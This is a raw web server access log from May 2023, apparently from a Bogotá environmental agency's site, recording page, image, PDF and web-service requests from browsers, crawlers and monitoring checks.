179.19.95.218 - - [13/May/2023:15:11:57 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
179.19.95.218 - - [13/May/2023:15:11:57 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
179.19.95.218 - - [13/May/2023:15:11:57 -0500] "GET /galeria/nivo-slider/demo/images/bannerrutaesperanza.jpg HTTP/1.1" 200 55560
179.19.95.218 - - [13/May/2023:15:11:57 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
179.19.95.218 - - [13/May/2023:15:11:57 -0500] "GET /galeria/nivo-slider/demo/images/Bannersedeelectronica.jpg HTTP/1.1" 200 40383
179.19.95.218 - - [13/May/2023:15:11:57 -0500] "GET /galeria/nivo-slider/demo/images/banneraire2021.jpg HTTP/1.1" 200 265101
179.19.95.218 - - [13/May/2023:15:11:57 -0500] "GET /galeria/nivo-slider/demo/images/Bannerplasticosseptiembre.jpg HTTP/1.1" 200 45633
179.19.95.218 - - [13/May/2023:15:11:57 -0500] "GET /galeria/nivo-slider/demo/images/bannerresiduoshospitalariosagosto.jpg HTTP/1.1" 200 36499
179.19.95.218 - - [13/May/2023:15:11:57 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopularcrr68.jpg HTTP/1.1" 200 51887
179.19.95.218 - - [13/May/2023:15:11:57 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopular.jpeg HTTP/1.1" 200 41707
179.19.95.218 - - [13/May/2023:15:11:57 -0500] "GET /galeria/nivo-slider/demo/images/bannercapacitacionesbogota.jpg HTTP/1.1" 200 42416
179.19.95.218 - - [13/May/2023:15:11:57 -0500] "GET /galeria/nivo-slider/demo/images/bannerclases2021.jpg HTTP/1.1" 200 68230
179.19.95.218 - - [13/May/2023:15:11:57 -0500] "GET /galeria/nivo-slider/demo/images/Bannerenvases.jpg HTTP/1.1" 200 37316
179.19.95.218 - - [13/May/2023:15:11:57 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
179.19.95.218 - - [13/May/2023:15:11:57 -0500] "GET /galeria/nivo-slider/demo/images/Bannervirtualescanales.jpg HTTP/1.1" 200 174544
179.19.95.218 - - [13/May/2023:15:11:58 -0500] "GET /galeria/nivo-slider/demo/images/bannertortuga_optimized.jpg HTTP/1.1" 200 39066
179.19.95.218 - - [13/May/2023:15:11:58 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
179.19.95.218 - - [13/May/2023:15:11:58 -0500] "GET /galeria/nivo-slider/demo/images/Bannermujeresquereverdecen.jpg HTTP/1.1" 200 46558
179.19.95.218 - - [13/May/2023:15:11:58 -0500] "GET /galeria/nivo-slider/demo/images/bannertrafico_optimized.jpg HTTP/1.1" 200 42578
179.19.95.218 - - [13/May/2023:15:11:59 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
179.19.95.218 - - [13/May/2023:15:11:59 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
89.39.106.102 - - [13/May/2023:15:12:17 -0500] "GET /secretaria-de-ambiente-adelanta-rehabilitacion-de-un-tayra-mamifero-entregado-en-bogota.html HTTP/1.1" 200 786
89.39.106.102 - - [13/May/2023:15:12:18 -0500] "GET /favicon.ico HTTP/1.1" 404 1382
186.154.158.86 - - [13/May/2023:15:12:54 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.154.158.86 - - [13/May/2023:15:12:54 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.154.158.86 - - [13/May/2023:15:12:54 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
216.245.221.92 - - [13/May/2023:15:12:54 -0500] "HEAD / HTTP/1.1" 200 -
152.202.88.90 - - [13/May/2023:15:15:22 -0500] "GET /secretaria-de-ambiente-adelanta-rehabilitacion-de-un-tayra-mamifero-entregado-en-bogota.html HTTP/1.1" 200 786
52.125.136.237 - - [13/May/2023:15:15:29 -0500] "GET /images/jardines-verticales_optimized.jpeg HTTP/1.1" 200 138197
201.245.192.253 - - [13/May/2023:15:15:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
123.208.238.70 - - [13/May/2023:15:16:12 -0500] "GET /secretaria-de-ambiente-adelanta-rehabilitacion-de-un-tayra-mamifero-entregado-en-bogota.html HTTP/1.1" 200 786
66.249.64.33 - - [13/May/2023:15:16:14 -0500] "-" 408 -
172.22.2.4 - - [13/May/2023:15:14:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.84 - - [13/May/2023:15:16:37 -0500] "GET /bogota-fashion-week-una-ventana-para-la-sostenibilidad-en-bogota.html HTTP/1.1" 200 754
172.22.2.4 - - [13/May/2023:15:15:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
51.158.37.186 - - [13/May/2023:15:17:48 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
216.245.221.92 - - [13/May/2023:15:17:54 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [13/May/2023:15:19:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40204
201.245.192.253 - - [13/May/2023:15:19:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44114
201.245.192.253 - - [13/May/2023:15:20:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [13/May/2023:15:20:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [13/May/2023:15:22:54 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.225 - - [13/May/2023:15:23:03 -0500] "GET /images/25%20de%20enero%20%C3%A1rbol%20inclinado%20sobre%20cicloruta.jpg HTTP/1.1" 404 1034
172.22.2.4 - - [13/May/2023:15:21:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
201.245.192.253 - - [13/May/2023:15:25:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
66.249.64.63 - - [13/May/2023:15:25:46 -0500] "-" 408 -
216.245.221.92 - - [13/May/2023:15:27:54 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.146 - - [13/May/2023:15:28:05 -0500] "GET /bla/resoluciones/notificaciones/autos%202019/3095.pdf HTTP/1.1" 200 255593
172.22.2.4 - - [13/May/2023:15:26:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/May/2023:15:27:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
201.245.192.253 - - [13/May/2023:15:29:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40204
201.245.192.253 - - [13/May/2023:15:29:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44114
207.46.13.219 - - [13/May/2023:15:30:22 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
40.77.167.146 - - [13/May/2023:15:30:26 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
40.77.167.146 - - [13/May/2023:15:30:26 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [13/May/2023:15:30:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [13/May/2023:15:30:50 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
186.155.19.161 - - [13/May/2023:15:30:52 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
190.26.141.33 - - [13/May/2023:15:30:56 -0500] "GET /secretaria-de-ambiente-adelanta-rehabilitacion-de-un-tayra-mamifero-entregado-en-bogota.html HTTP/1.1" 200 786
186.155.19.161 - - [13/May/2023:15:31:08 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 12235
186.155.19.161 - - [13/May/2023:15:31:08 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 492963
116.202.35.116 - - [13/May/2023:15:31:21 -0500] "-" 408 -
172.22.2.4 - - [13/May/2023:15:30:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
20.15.133.167 - - [13/May/2023:15:31:56 -0500] "GET /bogota-fashion-week-una-ventana-para-la-sostenibilidad-en-bogota.html HTTP/1.1" 200 754
172.22.2.4 - - [13/May/2023:15:32:13 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1139
216.245.221.92 - - [13/May/2023:15:32:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/May/2023:15:32:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/May/2023:15:33:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55221
193.35.18.65 - - [13/May/2023:15:35:04 -0500] "GET / HTTP/1.1" 200 319
193.35.18.65 - - [13/May/2023:15:35:04 -0500] "POST /HNAP1/ HTTP/1.1" 404 1018
201.245.192.253 - - [13/May/2023:15:35:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [13/May/2023:15:34:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59656
216.245.221.92 - - [13/May/2023:15:37:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/May/2023:15:38:00 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [13/May/2023:15:38:09 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
201.245.192.253 - - [13/May/2023:15:39:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40204
201.245.192.253 - - [13/May/2023:15:39:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44114
172.22.2.4 - - [13/May/2023:15:38:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [13/May/2023:15:40:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [13/May/2023:15:38:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
